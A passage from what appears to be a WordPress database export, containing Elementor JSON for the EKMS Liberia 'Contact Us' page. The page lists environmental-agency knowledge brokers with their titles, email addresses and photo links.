\\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23962,3510,'_elementor_edit_mode','builder'),(23963,3510,'_elementor_template_type','wp-page'),(23964,3510,'_elementor_version','3.0.16'),(23965,3510,'_wp_page_template','default'),(23966,3510,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/bgoll.jpg\",\"id\":3426}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a 